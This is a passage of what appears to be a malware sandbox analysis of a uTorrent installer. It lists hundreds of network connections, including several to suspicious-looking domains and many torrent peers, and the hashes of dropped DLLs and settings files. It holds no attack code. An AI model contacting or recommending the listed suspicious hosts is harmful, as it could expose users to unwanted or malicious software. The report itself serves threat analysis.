| US | 8.8.8.8:53 | bottom.campaign.aliexpress.com | udp |
| US | 8.8.8.8:53 | c.go-mpulse.net | udp |
| US | 8.8.8.8:53 | c.go-mpulse.net | udp |
| US | 8.8.8.8:53 | ae.mmstat.com | udp |
| US | 8.8.8.8:53 | ae.mmstat.com | udp |
| GB | 2.18.108.132:443 | c.go-mpulse.net | tcp |
| SG | 47.246.110.44:443 | ae.mmstat.com | tcp |
| GB | 163.181.154.237:443 | bottom.campaign.aliexpress.com | tcp |
| US | 8.8.8.8:53 | ae01.alicdn.com | udp |
| US | 8.8.8.8:53 | ae01.alicdn.com | udp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | udp |
| US | 8.8.8.8:53 | acs.aliexpress.com | udp |
| US | 8.8.8.8:53 | acs.aliexpress.com | udp |
| US | 8.8.8.8:53 | aeis.alicdn.com | udp |
| US | 8.8.8.8:53 | aeis.alicdn.com | udp |
| DE | 47.246.146.13:443 | acs.aliexpress.com | tcp |
| US | 8.8.8.8:53 | us.ynuf.aliapp.org | udp |
| US | 8.8.8.8:53 | us.ynuf.aliapp.org | udp |
| DE | 47.246.146.54:443 | us.ynuf.aliapp.org | tcp |
| US | 8.8.8.8:53 | 3sr0fd.tdum.alibaba.com | udp |
| US | 8.8.8.8:53 | 3sr0fd.tdum.alibaba.com | udp |
| US | 8.8.8.8:53 | ynuf.aliapp.org | udp |
| US | 8.8.8.8:53 | ynuf.aliapp.org | udp |
| CN | 124.239.14.253:443 | ynuf.aliapp.org | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| CN | 124.239.14.253:443 | ynuf.aliapp.org | tcp |
| RU | 212.103.119.182:49001 | udp | |
| US | 8.8.8.8:443 | dns.google | udp |
| DE | 47.246.146.191:443 | 3sr0fd.tdum.alibaba.com | tcp |
| IL | 212.199.154.18:19463 | udp | |
| CA | 70.71.199.183:1449 | udp | |
| DZ | 41.99.87.115:55196 | tcp | |
| CN | 124.239.14.252:443 | ynuf.aliapp.org | tcp |
| CN | 124.239.14.252:443 | ynuf.aliapp.org | tcp |
| BE | 109.138.39.147:58947 | udp | |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| US | 185.208.158.202:80 | bbeeeki.com | tcp |
| NL | 89.105.201.183:2023 | tcp | |
| US | 72.21.17.92:32365 | udp | |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| US | 8.8.8.8:53 | rouonixon.com | udp |
| NL | 139.45.197.238:443 | rouonixon.com | tcp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 172.67.169.157:443 | my.rtmark.net | udp |
| US | 172.67.169.157:443 | my.rtmark.net | tcp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| GB | 23.214.144.96:443 | s.click.aliexpress.com | tcp |
| US | 8.8.8.8:53 | www.aliexpress.com | udp |
| US | 8.8.8.8:53 | www.aliexpress.com | udp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| US | 8.8.8.8:53 | s.go-mpulse.net | udp |
| US | 8.8.8.8:53 | s.go-mpulse.net | udp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| GB | 95.100.244.132:443 | s.go-mpulse.net | tcp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| US | 8.8.8.8:53 | c.go-mpulse.net | udp |
| US | 8.8.8.8:53 | c.go-mpulse.net | udp |
| GB | 2.18.108.132:443 | c.go-mpulse.net | tcp |
| GB | 2.18.108.132:443 | c.go-mpulse.net | udp |
| US | 38.83.113.109:51506 | udp | |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 104.231.154.69:6889 | udp | |
| US | 172.234.222.138:80 | torrentclub.tech | tcp |
| US | 172.234.222.143:80 | torrentclub.tech | tcp |
| NL | 185.149.91.65:51026 | udp | |
| GB | 149.86.39.227:41963 | udp | |
| US | 8.8.8.8:443 | dns.google | udp |
| US | 172.249.114.78:51413 | udp | |
| US | 146.70.172.32:62801 | tcp | |
| GB | 181.215.176.83:50993 | tcp | |
| US | 146.70.173.160:62801 | tcp | |
| US | 34.192.104.143:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 34.192.104.143:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| GB | 161.51.236.3:49001 | udp | |
| US | 69.121.163.21:6882 | udp | |
| RU | 82.204.172.170:6881 | udp | |
| US | 8.8.4.4:443 | dns.google | udp |
| GB | 216.58.212.227:443 | update.googleapis.com | tcp |
| US | 185.208.158.202:80 | bbeeeki.com | tcp |
| NL | 89.105.201.183:2023 | tcp | |
| NL | 178.162.174.226:28000 | udp | |
| US | 192.227.134.50:16881 | udp | |
| BR | 200.193.131.13:40589 | udp | |
| CN | 60.187.175.97:1047 | udp | |
| DZ | 41.99.87.115:55196 | tcp | |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| FR | 62.210.181.13:48750 | udp | |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| US | 8.8.8.8:53 | rouonixon.com | udp |
| US | 8.8.8.8:53 | rouonixon.com | udp |
| NL | 139.45.197.238:443 | rouonixon.com | tcp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 104.21.27.183:443 | my.rtmark.net | udp |
| US | 104.21.27.183:443 | my.rtmark.net | tcp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| GB | 23.214.144.96:443 | s.click.aliexpress.com | tcp |
| US | 8.8.8.8:53 | www.aliexpress.com | udp |
| US | 8.8.8.8:53 | www.aliexpress.com | udp |
| US | 8.8.8.8:53 | www.aliexpress.com | udp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| US | 8.8.8.8:53 | s.go-mpulse.net | udp |
| US | 8.8.8.8:53 | s.go-mpulse.net | udp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| US | 8.8.8.8:53 | ae01.alicdn.com | udp |
| US | 8.8.8.8:53 | ae01.alicdn.com | udp |
| GB | 95.100.244.132:443 | s.go-mpulse.net | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| US | 8.8.8.8:53 | bottom.campaign.aliexpress.com | udp |
| US | 8.8.8.8:53 | bottom.campaign.aliexpress.com | udp |
| US | 8.8.8.8:53 | c.go-mpulse.net | udp |
| US | 8.8.8.8:53 | c.go-mpulse.net | udp |
| GB | 2.18.108.132:443 | c.go-mpulse.net | tcp |
| US | 8.8.8.8:53 | ae.mmstat.com | udp |
| US | 8.8.8.8:53 | ae.mmstat.com | udp |
| GB | 163.181.154.241:443 | bottom.campaign.aliexpress.com | tcp |
| SG | 47.246.110.42:443 | ae.mmstat.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | udp |
| CA | 184.75.221.59:17798 | udp | |
| US | 8.8.8.8:53 | acs.aliexpress.com | udp |
| US | 8.8.8.8:53 | acs.aliexpress.com | udp |
| US | 8.8.8.8:53 | 59.221.75.184.in-addr.arpa | udp |
| DE | 47.246.146.126:443 | acs.aliexpress.com | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:443 | dns.google | udp |
| JP | 113.38.110.7:6889 | udp | |
| KR | 125.135.64.7:7523 | udp | |
| NL | 185.165.243.54:6886 | udp | |
| US | 172.234.222.138:80 | torrentclub.tech | tcp |
| US | 172.234.222.143:80 | torrentclub.tech | tcp |
| US | 185.208.158.202:80 | bbeeeki.com | tcp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| NL | 95.211.83.89:52718 | udp | |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| US | 8.8.8.8:53 | dreamsnest.com | udp |
| US | 8.8.8.8:53 | dreamsnest.com | udp |
| US | 172.67.211.143:443 | dreamsnest.com | udp |
| US | 172.67.211.143:443 | dreamsnest.com | tcp |
| US | 8.8.8.8:53 | secret-sleeps.dreamingfordreams.com | udp |
| US | 8.8.8.8:53 | secret-sleeps.dreamingfordreams.com | udp |
| US | 104.21.93.126:443 | secret-sleeps.dreamingfordreams.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| GB | 142.250.200.14:443 | fundingchoicesmessages.google.com | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| BE | 64.233.167.154:443 | stats.g.doubleclick.net | tcp |
| GB | 142.250.179.227:443 | www.google.co.uk | udp |
| GB | 142.250.200.14:443 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.200.14:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.167.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | cloudflareinsights.com | udp |
| US | 104.16.80.73:443 | cloudflareinsights.com | tcp |
| CL | 200.90.211.40:19665 | udp | |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| BR | 177.118.136.171:56495 | udp | |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:443 | dns.google | udp |
| GB | 13.87.96.169:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 13.87.96.169:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 13.87.96.169:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 13.87.96.169:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 13.87.96.169:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 13.87.96.169:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 87.248.204.1:443 | video.rainberrytv.com | tcp |
| GB | 87.248.204.1:443 | video.rainberrytv.com | tcp |
| GB | 87.248.204.1:443 | video.rainberrytv.com | tcp |
| US | 44.196.243.250:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.196.243.250:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.196.243.250:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.196.243.250:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.196.243.250:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.196.243.250:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| FR | 178.32.197.49:443 | www9.smartadserver.com | tcp |
| FR | 178.32.197.49:443 | www9.smartadserver.com | tcp |
| CA | 69.165.224.193:25447 | udp | |
| NL | 46.232.211.143:64245 | udp | |
| US | 54.167.59.98:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| FR | 5.39.85.82:55727 | udp | |
| US | 34.192.104.143:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 34.192.104.143:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| FR | 178.32.197.49:443 | www9.smartadserver.com | tcp |
| FR | 178.32.197.49:443 | www9.smartadserver.com | tcp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| US | 8.8.8.8:53 | exclusivesearches.xyz | udp |
| US | 8.8.8.8:53 | exclusivesearches.xyz | udp |
| US | 52.44.32.213:443 | exclusivesearches.xyz | tcp |
| US | 8.8.8.8:53 | comarinis.com | udp |
| US | 8.8.8.8:53 | comarinis.com | udp |
| US | 104.21.85.120:443 | comarinis.com | udp |
| US | 104.21.85.120:443 | comarinis.com | tcp |
| US | 8.8.8.8:53 | 120.85.21.104.in-addr.arpa | udp |
| SG | 188.241.80.38:16813 | udp | |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| GB | 181.215.176.83:50993 | tcp | |
| PY | 45.228.136.204:44655 | udp | |
| MX | 189.156.243.194:14366 | udp | |
| US | 185.208.158.202:80 | bbeeeki.com | tcp |
| ES | 79.117.47.90:6881 | udp | |
| US | 8.8.8.8:53 | 90.47.117.79.in-addr.arpa | udp |
| FR | 178.32.197.49:443 | www9.smartadserver.com | tcp |
| FR | 178.32.197.49:443 | www9.smartadserver.com | tcp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| NL | 169.150.223.229:64067 | udp | |
| US | 8.8.8.8:53 | rouonixon.com | udp |
| US | 8.8.8.8:53 | rouonixon.com | udp |
| NL | 139.45.197.238:443 | rouonixon.com | tcp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 172.67.169.157:443 | my.rtmark.net | udp |
| US | 172.67.169.157:443 | my.rtmark.net | tcp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| GB | 23.214.144.96:443 | s.click.aliexpress.com | tcp |
| US | 8.8.8.8:53 | www.aliexpress.com | udp |
| US | 8.8.8.8:53 | www.aliexpress.com | udp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| US | 8.8.8.8:53 | s.go-mpulse.net | udp |
| US | 8.8.8.8:53 | s.go-mpulse.net | udp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| US | 8.8.8.8:53 | ae01.alicdn.com | udp |
| US | 8.8.8.8:53 | ae01.alicdn.com | udp |
| GB | 95.100.244.132:443 | s.go-mpulse.net | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| US | 8.8.8.8:53 | c.go-mpulse.net | udp |
| US | 8.8.8.8:53 | c.go-mpulse.net | udp |
| GB | 2.18.108.132:443 | c.go-mpulse.net | tcp |
| GB | 2.18.108.132:443 | c.go-mpulse.net | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:443 | dns.google | tcp |
| BR | 186.216.44.222:50454 | udp | |
| FR | 90.26.201.5:61142 | udp | |
| NL | 95.211.135.119:30170 | udp | |
| US | 8.8.8.8:443 | dns.google | udp |
| FR | 178.32.197.48:443 | www9.smartadserver.com | tcp |
| FR | 178.32.197.48:443 | www9.smartadserver.com | tcp |
| MY | 175.143.74.73:34432 | udp | |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| BR | 45.162.129.154:47862 | udp | |
| US | 8.8.8.8:53 | rouonixon.com | udp |
| US | 8.8.8.8:53 | rouonixon.com | udp |
| US | 8.8.8.8:53 | 154.129.162.45.in-addr.arpa | udp |
| NL | 139.45.197.238:443 | rouonixon.com | tcp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 172.67.169.157:443 | my.rtmark.net | udp |
| US | 172.67.169.157:443 | my.rtmark.net | tcp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| GB | 23.214.144.96:443 | s.click.aliexpress.com | tcp |
| US | 8.8.8.8:53 | www.aliexpress.com | udp |
| US | 8.8.8.8:53 | www.aliexpress.com | udp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| US | 8.8.8.8:53 | s.go-mpulse.net | udp |
| US | 8.8.8.8:53 | s.go-mpulse.net | udp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| US | 8.8.8.8:53 | ae01.alicdn.com | udp |
| US | 8.8.8.8:53 | ae01.alicdn.com | udp |
| GB | 95.100.244.132:443 | s.go-mpulse.net | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| US | 8.8.8.8:53 | c.go-mpulse.net | udp |
| US | 8.8.8.8:53 | c.go-mpulse.net | udp |
| US | 8.8.8.8:53 | bottom.campaign.aliexpress.com | udp |
| GB | 2.18.108.132:443 | c.go-mpulse.net | tcp |
| US | 8.8.8.8:53 | ae.mmstat.com | udp |
| US | 8.8.8.8:53 | ae.mmstat.com | udp |
| GB | 163.181.154.244:443 | bottom.campaign.aliexpress.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | udp |
| SG | 47.246.110.42:443 | ae.mmstat.com | tcp |
| US | 8.8.8.8:53 | acs.aliexpress.com | udp |
| US | 8.8.8.8:53 | acs.aliexpress.com | udp |
| DE | 47.246.146.126:443 | acs.aliexpress.com | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| GB | 217.44.73.79:43558 | tcp | |
| NI | 190.212.57.206:30195 | udp | |
| US | 104.222.16.99:57190 | tcp | |
| US | 185.208.158.202:80 | bbeeeki.com | tcp |
| MX | 177.227.56.184:47262 | udp | |
| US | 8.8.8.8:53 | 184.56.227.177.in-addr.arpa | udp |
| CN | 114.227.158.87:56009 | udp | |
| US | 8.8.8.8:53 | video.rainberrytv.com | udp |
| FR | 178.32.197.48:443 | www9.smartadserver.com | tcp |
| FR | 178.32.197.48:443 | www9.smartadserver.com | tcp |
| US | 47.202.25.41:50321 | udp | |
| US | 8.8.8.8:53 | 41.25.202.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i-38.b-47142.ut.bench.utorrent.com | udp |
| US | 34.192.104.143:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 34.192.104.143:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| FR | 178.32.197.48:443 | www9.smartadserver.com | tcp |
| FR | 178.32.197.48:443 | www9.smartadserver.com | tcp |
| US | 38.114.114.245:26071 | udp | |
| US | 8.8.8.8:53 | 245.114.114.38.in-addr.arpa | udp |
| US | 3.214.87.95:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 3.214.87.95:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| MX | 205.164.194.133:46728 | udp | |
| FR | 178.32.197.48:443 | www9.smartadserver.com | tcp |
| FR | 178.32.197.48:443 | www9.smartadserver.com | tcp |
| TW | 122.116.184.60:34344 | udp | |
| AR | 181.89.93.245:54194 | udp | |
| US | 8.8.8.8:53 | 245.93.89.181.in-addr.arpa | udp |
| US | 172.234.222.138:80 | torrentclub.tech | tcp |
| US | 172.234.222.143:80 | torrentclub.tech | tcp |
| US | 8.8.8.8:443 | dns.google | udp |
| GB | 216.58.212.227:443 | update.googleapis.com | tcp |
| IQ | 185.181.109.197:50540 | udp | |
| US | 8.8.8.8:53 | 197.109.181.185.in-addr.arpa | udp |
| GB | 216.58.212.227:443 | update.googleapis.com | udp |
| RU | 89.222.152.46:49001 | udp | |
| US | 8.8.8.8:53 | 46.152.222.89.in-addr.arpa | udp |
| N/A | 10.127.0.42:50993 | tcp | |
| US | 8.8.8.8:443 | dns.google | udp |
| FR | 164.132.25.176:443 | www9.smartadserver.com | tcp |
| FR | 164.132.25.176:443 | www9.smartadserver.com | tcp |
| GB | 23.214.143.155:80 | api.steampowered.com | tcp |
| NL | 89.105.201.183:2023 | tcp | |
| US | 8.8.8.8:53 | 155.143.214.23.in-addr.arpa | udp |
| GY | 190.80.34.76:10816 | udp | |
| US | 146.70.173.160:62801 | tcp | |
| IL | 77.127.148.202:6881 | udp | |
| US | 146.70.172.32:62801 | tcp | |
| GB | 86.14.104.109:6889 | udp | |
| US | 54.167.59.98:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 54.167.59.98:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| GB | 23.214.143.155:80 | api.steampowered.com | tcp |
| NL | 89.105.201.183:2023 | tcp | |
| GY | 190.80.34.0:45817 | udp | |
| US | 34.111.113.40:443 | config.uca.cloud.unity3d.com | tcp |
| GB | 2.19.252.157:80 | www.msftncsi.com | tcp |
| US | 8.8.8.8:53 | 157.252.19.2.in-addr.arpa | udp |
| BR | 201.19.24.3:52319 | udp | |
| RU | 178.141.244.80:3442 | udp | |
| US | 34.111.113.40:443 | config.uca.cloud.unity3d.com | tcp |
| GB | 2.19.252.157:80 | www.msftncsi.com | tcp |
| CO | 181.55.20.201:8786 | udp | |
| IN | 223.186.25.197:4176 | udp | |
| US | 8.8.8.8:53 | 197.25.186.223.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.rapidfilestorage.com | udp |
| US | 44.226.34.177:443 | api.check-data.xyz | tcp |
| KZ | 185.22.66.16:80 | www.rapidfilestorage.com | tcp |
| KZ | 185.22.66.16:80 | www.rapidfilestorage.com | tcp |
| RU | 80.78.240.92:80 | rfiles4.tracemonitors.com | tcp |
| RU | 80.78.240.92:443 | rfiles4.tracemonitors.com | tcp |
| RU | 80.78.240.92:443 | rfiles4.tracemonitors.com | tcp |
| RU | 80.78.240.92:443 | rfiles4.tracemonitors.com | tcp |
| RU | 194.67.103.130:443 | x-finder.pro | tcp |
| RU | 194.67.103.130:443 | x-finder.pro | tcp |
| GB | 95.100.245.51:443 | store.steampowered.com | tcp |
| GB | 95.100.245.51:443 | store.steampowered.com | tcp |
| US | 8.8.8.8:53 | 130.103.67.194.in-addr.arpa | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| US | 151.101.195.52:443 | shared.fastly.steamstatic.com | tcp |
| US | 151.101.195.52:443 | shared.fastly.steamstatic.com | tcp |
| US | 151.101.195.52:443 | shared.fastly.steamstatic.com | tcp |
| US | 151.101.195.52:443 | shared.fastly.steamstatic.com | tcp |
| US | 151.101.195.52:443 | shared.fastly.steamstatic.com | tcp |
| US | 151.101.195.52:443 | shared.fastly.steamstatic.com | tcp |
| GB | 216.58.201.97:443 | clients2.googleusercontent.com | tcp |
| US | 151.101.195.52:443 | shared.fastly.steamstatic.com | tcp |
| US | 151.101.195.52:443 | shared.fastly.steamstatic.com | tcp |
| US | 151.101.195.52:443 | shared.fastly.steamstatic.com | tcp |
| US | 151.101.3.52:443 | shared.fastly.steamstatic.com | tcp |
| US | 151.101.3.52:443 | shared.fastly.steamstatic.com | tcp |
| US | 151.101.3.52:443 | shared.fastly.steamstatic.com | tcp |
| US | 151.101.3.52:443 | shared.fastly.steamstatic.com | tcp |
| US | 151.101.3.52:443 | shared.fastly.steamstatic.com | tcp |
| US | 151.101.3.52:443 | shared.fastly.steamstatic.com | tcp |
| AR | 186.22.18.240:14839 | udp | |
| GB | 95.100.245.51:443 | store.steampowered.com | tcp |
| GB | 95.100.245.51:443 | store.steampowered.com | tcp |
| US | 8.8.8.8:53 | api4.tracemonitors.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| NL | 89.105.201.183:2023 | tcp | |
| US | 44.226.34.177:443 | api4.tracemonitors.com | tcp |
| US | 151.101.195.52:443 | cdn.steamstatic.com | tcp |
| US | 151.101.195.52:443 | cdn.steamstatic.com | tcp |
| NL | 45.87.251.132:28096 | udp | |
| PL | 89.64.37.131:62583 | udp | |
| US | 151.101.195.52:443 | cdn.steamstatic.com | tcp |
| RU | 130.255.36.166:2079 | udp | |
| GB | 88.221.135.105:80 | r11.o.lencr.org | tcp |
| US | 151.101.195.52:443 | cdn.steamstatic.com | tcp |
| US | 151.101.195.52:443 | cdn.steamstatic.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\System.dll
| MD5 | cff85c549d536f651d4fb8387f1976f2 |
| SHA1 | d41ce3a5ff609df9cf5c7e207d3b59bf8a48530e |
| SHA256 | 8dc562cda7217a3a52db898243de3e2ed68b80e62ddcb8619545ed0b4e7f65a8 |
| SHA512 | 531d6328daf3b86d85556016d299798fa06fefc81604185108a342d000e203094c8c12226a12bd6e1f89b0db501fb66f827b610d460b933bd4ab936ac2fd8a88 |
C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\bt_datachannel.dll
| MD5 | dfca05beb0d6a31913c04b1314ca8b4a |
| SHA1 | 5fbbccf13325828016446f63d21250c723578841 |
| SHA256 | d4c4e05fade7e76f4a2d0c9c58a6b9b82b761d9951ffddd838c381549368e153 |
| SHA512 | 858d4fb9d073c51c0ab7a0b896c30e35376678cc12aec189085638376d3cc74c1821495692eac378e4509ef5dcab0e8b950ad5bfab66d2c62ab31bc0a75118cf |
C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\nsisFirewall.dll
| MD5 | f5bf81a102de52a4add21b8a367e54e0 |
| SHA1 | cf1e76ffe4a3ecd4dad453112afd33624f16751c |
| SHA256 | 53be5716ad80945cb99681d5dbda60492f5dfb206fbfdb776b769b3eeb18d2c2 |
| SHA512 | 6e280a75f706474ad31b2ce770fa34f54cb598528fac4477c466200a608b79c0f9b84011545595d9ba94331ad08e2f51bd42de91f92379db27686a28ba351256 |
C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\INetC.dll
| MD5 | 640bff73a5f8e37b202d911e4749b2e9 |
| SHA1 | 9588dd7561ab7de3bca392b084bec91f3521c879 |
| SHA256 | c1e568e25ec111184deb1b87cfda4bfec529b1abeab39b66539d998012f33502 |
| SHA512 | 39c6c358e2b480c8cbebcc1da683924c8092fb2947f2da4a8df1b0dc1fdda61003d91d12232a436ec88ff4e0995b7f6ee8c6efbdca935eaa984001f7a72fea0a |
C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe
| MD5 | b7f8a3909ad963d5b5260dacfa897e6e |
| SHA1 | 030ed1e99cb6d681dadca6068caf194bf67580e9 |
| SHA256 | 8837428a93c7ee46b9772d6c857e109e9baa0f5b28450f87fff7c0e8b87cf017 |
| SHA512 | 42569e974ef38ddea3300c6d82fd5e371c3cff8bdb04311c6bf3d94727fc37c5ef223ad07198ca2e499528a1671593ea6ef2bf3000611dbda49ca0a0c59c6bb4 |
memory/3132-35-0x0000000000400000-0x00000000009C3000-memory.dmp
C:\Users\Admin\AppData\Roaming\utorrent\settings.dat.old
| MD5 | 56b5537a597d3d8ef245eb221a1fecd8 |
| SHA1 | 7781619c765c30363369676a8cd959ba27c9643c |
| SHA256 | 6ef8a78dcd76e0f91a95d0d3b8d298a9ce0df5a5b7ac1350fd958e2041ce6f8e |
| SHA512 | 60fcc8992f62f7b7c90aa60332f45ae4e09e114d25e69f6bbd9a8f2fbde58e87f1b3479366269028d614c181eb5b9ad4f7b0a6dbae6683a99124556a9bc26ac6 |
C:\Users\Admin\AppData\Roaming\utorrent\toolbar.benc.new
| MD5 | aeee649704374e873627d801cd519ce0 |
| SHA1 | 40bd813e8daba94272cfe877d770a1aa2e9cc293 |
| SHA256 | b38a11c2f6b49cbec65a537274e3d9466f5a85570568a82614241b41a43987a0 |
